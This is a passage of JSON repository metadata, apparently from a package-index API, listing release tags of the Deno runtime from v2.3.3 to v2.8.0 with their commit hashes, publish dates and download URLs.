nd":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.